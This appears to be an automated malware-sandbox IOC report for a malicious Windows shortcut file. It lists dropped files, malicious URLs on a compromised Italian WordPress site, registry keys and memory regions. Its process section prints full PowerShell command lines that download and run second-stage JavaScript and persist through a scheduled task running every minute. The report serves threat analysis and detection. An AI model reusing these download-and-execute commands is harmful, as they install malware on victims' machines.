IOC Report
6K2g0GMmIE.lnk

loading gif

Files

File Path
Type
Category
Malicious
6K2g0GMmIE.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:55 2024, atime=Mon Apr 8 20:19:11 2024, length=455680, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js
ASCII text, with CRLF line terminators
dropped
malicious
C:\ProgramData\M77M75P1ZQW1.js
ASCII text, with very long lines (398)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_115qz1dn.1oh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lwfixj5.m1e.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eov0qpyo.kup.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fic3i2l3.tts.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwyqdzms.fyk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idighnof.pa5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_np3u5lu3.wb2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wh45t2ag.5ym.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TO3EHBI6S3OLBG1DPH1J.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a1f0dc316e092dfa.customDestinations-ms (copy)
data
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
malicious
C:\Windows\System32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
malicious
C:\Windows\System32\wscript.exe
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://www.italialife24.it
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
46.254.34.201
malicious
https://www.italialife24.it/
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/0
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
46.254.34.201
malicious
https://www.italialife24.it/wp-content/upl
unknown
malicious
https://www.italialife24.it/wp-content
unknown
malicious
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
46.254.34.201
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://www.microsoft.
unknown
https://github.com/Pester/Pester
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
unknown
https://go.microsl
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
unknown
https://aka.ms/pscore68
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phgD
unknown
http://www.microsoft.pki/
unknown
https://oneget.org
unknown
http://italialife24.it
unknown
http://www.italialife24.it
unknown
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
unknown
There are 23 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
italialife24.it
46.254.34.201
malicious
www.italialife24.it
unknown
malicious

IPs

IP
Domain
Country
Malicious
46.254.34.201
italialife24.it
Italy
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
19198DBD000
trusted library allocation
page read and write
18E6DFE000
stack
page read and write
BE878FA000
stack
page read and write
4AF3D7E000
stack
page read and write
4AF3E7B000
stack
page read and write
7FF848FC2000
trusted library allocation
page read and write
19196370000
heap
page read and write
25C6768D000
heap
page read and write
227302D4000
trusted library allocation
page read and write
5853E0E000
stack
page read and write
19198205000
trusted library allocation
page read and write
17A22B40000
trusted library allocation
page read and write
17A24889000
trusted library allocation
page read and write
2F284682000
heap
page read and write
27F6D5BD000
heap
page read and write
22746E75000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
19198071000
heap
page read and write
227305A7000
trusted library allocation
page read and write
25C6769C000
heap
page read and write
2F284656000
heap
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
15ECF3DB000
heap
page read and write
4AF33EE000
stack
page read and write
20D90950000
heap
page read and write
2F284510000
heap
page read and write
7FF848E0B000
trusted library allocation
page read and write
4AF3BFC000
stack
page read and write
2DF167F000
stack
page read and write
2F2845F0000
heap
page read and write
2BB94704000
heap
page read and write
15BEC0AE000
heap
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
585414C000
stack
page read and write
7FF848E02000
trusted library allocation
page read and write
15BEE264000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
55A9ACF000
stack
page read and write
2BB946B9000
heap
page read and write
2BB948DD000
heap
page read and write
15BEC09A000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
7FF848E23000
trusted library allocation
page execute and read and write
5853E8E000
stack
page read and write
7FF848EA6000
trusted library allocation
page read and write
55A9C4B000
stack
page read and write
15BEC08E000
heap
page read and write
2BB946E6000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
2272E795000
heap
page read and write
2272CB20000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
58540CF000
stack
page read and write
25C6763B000
heap
page read and write
4AF377E000
stack
page read and write
25C67689000
heap
page read and write
15B80076000
trusted library allocation
page read and write
2272CB28000
heap
page read and write
15BEC0D5000
heap
page read and write
15ECF3CE000
heap
page read and write
2272EEFC000
trusted library allocation
page read and write
15ECF725000
heap
page read and write
25C676B7000
heap
page read and write
7B10F7E000
stack
page read and write
22746E82000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
25C676AA000
heap
page read and write
191962B0000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
2BB948D5000
heap
page read and write
15ECF3DA000
heap
page read and write
22746CF0000
heap
page read and write
7B11178000
stack
page read and write
1F5CBBD0000
heap
page read and write
191A8205000
trusted library allocation
page read and write
55A9B4E000
stack
page read and write
55A8BF9000
stack
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
15BEE23A000
heap
page read and write
27F6D7DC000
heap
page read and write
1F5CBC58000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
27F6D58E000
heap
page read and write
BE87FFD000
stack
page read and write
7FF848F92000
trusted library allocation
page read and write
15ECF42B000
heap
page read and write
15B81853000
trusted library allocation
page read and write
25C6766E000
heap
page read and write
27F6D546000
heap
page read and write
2272CA80000
heap
page read and write
17A21198000
heap
page read and write
55A9A0E000
stack
page read and write
15BEDF10000
heap
page read and write
2BB946E6000
heap
page read and write
15BEDFDD000
heap
page read and write
25C67689000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
FE18DFF000
stack
page read and write
7FF848F06000
trusted library allocation
page execute and read and write
191A833B000
trusted library allocation
page read and write
2272F94C000
trusted library allocation
page read and write
4AF3A78000
stack
page read and write
21229A60000
heap
page read and write
7FF849000000
trusted library allocation
page read and write
25C67682000
heap
page read and write
7FF848EDC000
trusted library allocation
page execute and read and write
2272CBAB000
heap
page read and write
17A3B2E4000
heap
page read and write
21229D44000
heap
page read and write
15ED0E04000
heap
page read and write
227302D0000
trusted library allocation
page read and write
17A3B3F7000
heap
page execute and read and write
7FF849130000
trusted library allocation
page read and write
17A23612000
trusted library allocation
page read and write
8981FFB000
stack
page read and write
2BB946E6000
heap
page read and write
19199768000
trusted library allocation
page read and write
18E6AFF000
stack
page read and write
19196278000
heap
page read and write
55A9CCE000
stack
page read and write
2272CDB0000
trusted library allocation
page read and write
15ECF40D000
heap
page read and write
25C67682000
heap
page read and write
1F5CBF55000
heap
page read and write
5853FCF000
stack
page read and write
15BEC010000
trusted library allocation
page read and write
15B901B3000
trusted library allocation
page read and write
25C67692000
heap
page read and write
15ECF3BD000
heap
page read and write
15ECF3F5000
heap
page read and write
2272EB44000
heap
page read and write
2BB963C0000
heap
page read and write
21229AD9000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
17A22B10000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
15B815F4000
trusted library allocation
page read and write
15BEBFF5000
heap
page read and write
17A3B564000
heap
page read and write
27F6D53D000
heap
page read and write
15B9007D000
trusted library allocation
page read and write
2273ED47000
trusted library allocation
page read and write
191B0329000
heap
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
22746DE0000
heap
page read and write
1F5CBC5E000
heap
page read and write
8981DFD000
stack
page read and write
25C6766F000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
25C67689000
heap
page read and write
19198030000
trusted library allocation
page read and write
FE18CFF000
stack
page read and write
22746E7D000
heap
page read and write
22746DEE000
heap
page read and write
25C6765E000
heap
page read and write
17A24E8D000
trusted library allocation
page read and write
BE87EFF000
stack
page read and write
55A9BCC000
stack
page read and write
15ECF3FD000
heap
page read and write
27F6D56B000
heap
page read and write
2272CB46000
heap
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
5853F0D000
stack
page read and write
7FF848FA1000
trusted library allocation
page read and write
7FF848E3B000
trusted library allocation
page read and write
15BEDD2F000
heap
page read and write
2BB9470C000
heap
page read and write
15ECF3CF000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
15ECF3D5000
heap
page read and write
2272CD30000
heap
page readonly
27F6D58E000
heap
page read and write
15B8160A000
trusted library allocation
page read and write
15B81643000
trusted library allocation
page read and write
15B81C20000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
27F6D53C000
heap
page read and write
2F284628000
heap
page read and write
7B10E7D000
stack
page read and write
27F6D4C0000
heap
page read and write
2BB9472A000
heap
page read and write
15ECF3E0000
heap
page read and write
1919979A000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
27F6D53A000
heap
page read and write
17A24891000
trusted library allocation
page read and write
55A88FE000
stack
page read and write
7FF848FAA000
trusted library allocation
page read and write
58533BB000
stack
page read and write
4AF3CFE000
stack
page read and write
15BEC096000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
191B0216000
heap
page execute and read and write
17A24867000
trusted library allocation
page read and write
7FF848E24000
trusted library allocation
page read and write
191962B6000
heap
page read and write
4AF38FE000
stack
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
7B11F0E000
stack
page read and write
2273ECD1000
trusted library allocation
page read and write
17A22CE9000
heap
page read and write
191963A0000
heap
page read and write
7FF848E0B000
trusted library allocation
page read and write
25C693B0000
heap
page read and write
7FF848E04000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page execute and read and write
25C67689000
heap
page read and write
2F284678000
heap
page read and write
6F683FE000
stack
page read and write
27F6D575000
heap
page read and write
15ECF3D9000
heap
page read and write
15B815F6000
trusted library allocation
page read and write
7FF848F92000
trusted library allocation
page read and write
25C67682000
heap
page read and write
7B1127E000
stack
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
7FF8490C0000
trusted library allocation
page read and write
191962CE000
heap
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
898133A000
stack
page read and write
1F5CBBF0000
heap
page read and write
17A210A0000
heap
page read and write
2272CD10000
trusted library allocation
page read and write
7B1208E000
stack
page read and write
15B81C24000
trusted library allocation
page read and write
BE5F1FE000
stack
page read and write
15ECF42B000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
7FF8490B0000
trusted library allocation
page read and write
7B1200D000
stack
page read and write
25C67647000
heap
page read and write
2F28467B000
heap
page read and write
2272EBB0000
heap
page read and write
25C693B9000
heap
page read and write
5853078000
stack
page read and write
7FF849090000
trusted library allocation
page read and write
BE5F0FB000
stack
page read and write
15B81608000
trusted library allocation
page read and write
18E67FE000
stack
page read and write
89816FE000
stack
page read and write
7FF849120000
trusted library allocation
page read and write
2DF1369000
stack
page read and write
17A22CD0000
heap
page read and write
15ECF3FD000
heap
page read and write
17A21040000
heap
page read and write
2272EB69000
heap
page read and write
17A22BD0000
trusted library allocation
page read and write
191B02C2000
heap
page read and write
25C6764F000
heap
page read and write
25C67682000
heap
page read and write
20D90C60000
heap
page read and write
15ECF3CD000
heap
page read and write
17A3B500000
heap
page read and write
20D90930000
heap
page read and write
27F6D58E000
heap
page read and write
2BB945B0000
heap
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
7FF848FD2000
trusted library allocation
page read and write
17A333D3000
trusted library allocation
page read and write
25C67618000
heap
page read and write
17A3B220000
heap
page read and write
15BEC094000
heap
page read and write
15BEDEA0000
heap
page execute and read and write
2273ED3B000
trusted library allocation
page read and write
17A33230000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
2272E790000
heap
page read and write
55A8D3E000
stack
page read and write
15ECF720000
heap
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
15BEDFE0000
heap
page read and write
55A89FE000
stack
page read and write
15BEE229000
heap
page read and write
15ED2D60000
trusted library allocation
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
7B112FE000
stack
page read and write
15ECF3A1000
heap
page read and write
2F284648000
heap
page read and write
27F6D546000
heap
page read and write
191B0290000
heap
page read and write
17A24E89000
trusted library allocation
page read and write
7FF848E03000
trusted library allocation
page execute and read and write
2BB9471B000
heap
page read and write
19196485000
heap
page read and write
18E66FE000
stack
page read and write
15BEBFF0000
heap
page read and write
191B05FE000
heap
page read and write
4F3337F000
unkown
page read and write
15ECF3CD000
heap
page read and write
17A23221000
trusted library allocation
page read and write
BE879FE000
stack
page read and write
227302B1000
trusted library allocation
page read and write
17A3B24A000
heap
page read and write
27F6D7D0000
heap
page read and write
2272ECD1000
trusted library allocation
page read and write
7FF848DF2000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
7B11E4E000
stack
page read and write
7FF848FF0000
trusted library allocation
page read and write
19199DB2000
trusted library allocation
page read and write
17A21100000
heap
page read and write
2F284695000
heap
page read and write
191994D4000
trusted library allocation
page read and write
25C67530000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
17A21360000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
191B05F2000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
191B05B0000
heap
page read and write
15ECF407000
heap
page read and write
191962FA000
heap
page read and write
15ECF3F5000
heap
page read and write
7FF849010000
trusted library allocation
page execute and read and write
15BEDEC0000
heap
page execute and read and write
191964B0000
heap
page execute and read and write
15ECF3BE000
heap
page read and write
17A248D7000
trusted library allocation
page read and write
25C69064000
heap
page read and write
227308ED000
trusted library allocation
page read and write
5852E7D000
stack
page read and write
7B109DE000
stack
page read and write
7B111FC000
stack
page read and write
15ECF3A7000
heap
page read and write
2F284885000
heap
page read and write
7B10D7F000
stack
page read and write
7FF8490A0000
trusted library allocation
page read and write
191B05C0000
heap
page read and write
19196240000
heap
page read and write
7B10C72000
stack
page read and write
7B11ECD000
stack
page read and write
15ECF41A000
heap
page read and write
19199A0D000
trusted library allocation
page read and write
19199788000
trusted library allocation
page read and write
17A21138000
heap
page read and write
1919976D000
trusted library allocation
page read and write
191B05F8000
heap
page read and write
15B80C2C000
trusted library allocation
page read and write
17A24918000
trusted library allocation
page read and write
2BB946DB000
heap
page read and write
4AF33A5000
stack
page read and write
4AF397E000
stack
page read and write
227308F1000
trusted library allocation
page read and write
15B815D9000
trusted library allocation
page read and write
17A21192000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
7FF84915E000
trusted library allocation
page read and write
18E6BFF000
stack
page read and write
191963D0000
trusted library section
page read and write
FE192FC000
stack
page read and write
7B10CFF000
stack
page read and write
15BEDFB3000
heap
page read and write
6F684FE000
stack
page read and write
2272EBAC000
heap
page read and write
2BB9472A000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
22746E62000
heap
page read and write
4F333FF000
stack
page read and write
17A22B50000
heap
page readonly
2F286080000
heap
page read and write
17A33291000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
15ECF406000
heap
page read and write
15ECF3DB000
heap
page read and write
22730311000
trusted library allocation
page read and write
17A20F60000
heap
page read and write
55A998E000
stack
page read and write
2272CD20000
heap
page execute and read and write
55A8CBC000
stack
page read and write
17A211E0000
heap
page read and write
25C69040000
heap
page read and write
17A3B26C000
heap
page read and write
19196400000
trusted library allocation
page read and write
5852DFE000
stack
page read and write
7FF848FA0000
trusted library allocation
page read and write
17A248B5000
trusted library allocation
page read and write
25C6765E000
heap
page read and write
2272E750000
heap
page execute and read and write
15BEE200000
heap
page read and write
15B81645000
trusted library allocation
page read and write
4AF3C7E000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
15ECF3F5000
heap
page read and write
7B10DFE000
stack
page read and write
2BB945D0000
heap
page read and write
2F284681000
heap
page read and write
227302A7000
trusted library allocation
page read and write
7FF8490C0000
trusted library allocation
page read and write
2272CB5E000
heap
page read and write
17A22CD5000
heap
page read and write
2F284620000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
7B1210D000
stack
page read and write
7FF8490F0000
trusted library allocation
page read and write
58532BE000
stack
page read and write
4AF39FD000
stack
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
15BEE24C000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
585343B000
stack
page read and write
22746E98000
heap
page read and write
25C6763C000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
15BEE222000
heap
page read and write
27F6F3D0000
heap
page read and write
17A21365000
heap
page read and write
25C67670000
heap
page read and write
2272E5FB000
heap
page read and write
6F688FE000
stack
page read and write
15BEC050000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
2272CB66000
heap
page read and write
191A81F9000
trusted library allocation
page read and write
19198191000
trusted library allocation
page read and write
17A23452000
trusted library allocation
page read and write
191962B4000
heap
page read and write
25C6766B000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
15ECF410000
heap
page read and write
15BEC098000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
191963C0000
trusted library section
page read and write
5852FFD000
stack
page read and write
191B03B0000
heap
page read and write
191B05D2000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
17A24AE5000
trusted library allocation
page read and write
7FF849000000
trusted library allocation
page read and write
17A24979000
trusted library allocation
page read and write
21229D40000
heap
page read and write
2DF13EE000
unkown
page read and write
7FF849010000
trusted library allocation
page read and write
2F2861A0000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
19199A68000
trusted library allocation
page read and write
25C67631000
heap
page read and write
15ECF310000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
25C6766C000
heap
page read and write
15ECF3CD000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
17A21060000
heap
page read and write
227302DD000
trusted library allocation
page read and write
18E6CFE000
stack
page read and write
15ECF3A8000
heap
page read and write
7B10FFD000
stack
page read and write
7FF8490E0000
trusted library allocation
page read and write
17A2488D000
trusted library allocation
page read and write
55A8B7D000
stack
page read and write
1F5CBBC0000
heap
page read and write
27F6D490000
heap
page read and write
58531B9000
stack
page read and write
25C67610000
heap
page read and write
17A2491C000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
17A33221000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
22746DD0000
heap
page read and write
2272EBA3000
heap
page read and write
7FF848FF0000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
191B0313000
heap
page read and write
191963E0000
trusted library allocation
page read and write
191964D5000
heap
page read and write
191999E1000
trusted library allocation
page read and write
17A3B311000
heap
page read and write
2272EB79000
heap
page read and write
8981AFF000
stack
page read and write
15BEDF00000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
25C69060000
heap
page read and write
2BB9472A000
heap
page read and write
7B10EFF000
stack
page read and write
22746DFE000
heap
page read and write
15BEC058000
heap
page read and write
17A22CB0000
heap
page execute and read and write
227302C1000
trusted library allocation
page read and write
17A22ED0000
heap
page read and write
19199A2C000
trusted library allocation
page read and write
17A24881000
trusted library allocation
page read and write
7FF8490DC000
trusted library allocation
page read and write
19197FF3000
trusted library allocation
page read and write
17A22B93000
trusted library allocation
page read and write
2BB94759000
heap
page read and write
15ECF39C000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
2BB946B0000
heap
page read and write
4AF367E000
stack
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
7FF848EE6000
trusted library allocation
page execute and read and write
15BEE1F0000
heap
page read and write
25C67647000
heap
page read and write
7FF848FDA000
trusted library allocation
page read and write
4AF36FE000
stack
page read and write
7B11079000
stack
page read and write
4AF484E000
stack
page read and write
15BEE008000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
2BB944D0000
heap
page read and write
25C67698000
heap
page read and write
27F6D546000
heap
page read and write
FE18AFE000
stack
page read and write
15BEC183000
trusted library allocation
page read and write
FE189FE000
stack
page read and write
55A85F2000
stack
page read and write
15BEBE80000
heap
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
17A3B420000
heap
page read and write
55A8E3E000
stack
page read and write
25C6766C000
heap
page read and write
55A887E000
stack
page read and write
15BEDF52000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
15BEE253000
heap
page read and write
17A21177000
heap
page read and write
55A9943000
stack
page read and write
25C67510000
heap
page read and write
21229AD0000
heap
page read and write
17A211DC000
heap
page read and write
27F6D56E000
heap
page read and write
17A2486C000
trusted library allocation
page read and write
191962AE000
heap
page read and write
17A24ABA000
trusted library allocation
page read and write
5852F7E000
stack
page read and write
15ECF3FD000
heap
page read and write
89817FE000
stack
page read and write
2F2846CD000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
15BEE006000
heap
page read and write
20D909F8000
heap
page read and write
191A81A1000
trusted library allocation
page read and write
15BEBFC0000
heap
page read and write
25C6AD50000
trusted library allocation
page read and write
15B8022C000
trusted library allocation
page read and write
2F28488D000
heap
page read and write
227302A4000
trusted library allocation
page read and write
7FF849140000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
7FF849170000
trusted library allocation
page read and write
55A8A7E000
stack
page read and write
2272CC14000
heap
page read and write
15B81B5B000
trusted library allocation
page read and write
19198180000
heap
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
22730828000
trusted library allocation
page read and write
20D90C65000
heap
page read and write
55A8EB8000
stack
page read and write
5852C72000
stack
page read and write
7FF848FB0000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
27F6D519000
heap
page read and write
7FF848FAA000
trusted library allocation
page read and write
15ECF388000
heap
page read and write
15ECF3D6000
heap
page read and write
27F6D4A0000
heap
page read and write
5852EFE000
stack
page read and write
17A22E20000
heap
page execute and read and write
191B0210000
heap
page execute and read and write
19196420000
trusted library allocation
page read and write
BE882FB000
stack
page read and write
17A24012000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
17A3B424000
heap
page read and write
15ECF3AE000
heap
page read and write
2F284695000
heap
page read and write
17A2119E000
heap
page read and write
25C67430000
heap
page read and write
17A211A0000
heap
page read and write
4AF3B7E000
stack
page read and write
21229A50000
heap
page read and write
7FF848F20000
trusted library allocation
page execute and read and write
7FF848ED6000
trusted library allocation
page execute and read and write
5853F4E000
stack
page read and write
7FF848FE2000
trusted library allocation
page read and write
15ECF3A1000
heap
page read and write
21229A80000
heap
page read and write
4F3367F000
stack
page read and write
7FF849070000
trusted library allocation
page read and write
2BB94709000
heap
page read and write
25C693B2000
heap
page read and write
15B90071000
trusted library allocation
page read and write
15BEC040000
heap
page readonly
25C67647000
heap
page read and write
6F689FE000
stack
page read and write
22747080000
heap
page read and write
15ED1240000
heap
page read and write
2272CD73000
trusted library allocation
page read and write
7FF848FB5000
